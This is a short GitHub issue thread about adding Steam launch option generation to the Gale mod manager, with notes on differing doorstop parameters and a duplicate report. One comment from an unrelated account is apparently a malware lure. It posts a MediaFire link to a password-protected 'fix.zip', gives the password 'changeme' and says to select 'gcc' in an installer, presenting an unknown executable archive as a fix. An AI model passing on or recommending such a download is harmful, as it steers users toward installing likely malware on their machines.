### ISSUE TITLE
[Feature Request] Add support for Steam launch options

### ISSUE THREAD

**Issue by Snooziepup** [Kesomannen/gale#88]

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Damglador** [comment]
If it's about generation launch option for a profile, that's what I wanted to suggest.
It's possible to grab a launch parameter from r2modman and just modify it for Gale, but its really inconvenient and inconsistent, for example Lethal Company has `--doorstop-target` in its launch param, when for Risk of Rain 2 it must be `--doorstop-target-assembly`. Having a button in Gale for automatically generating needed params would be really cool

**Comment by Damglador** [comment]
Btw I think that's a duplicate of https://github.com/Kesomannen/gale/issues/80

**Comment by Kesomannen** [comment]
Yeah. it is
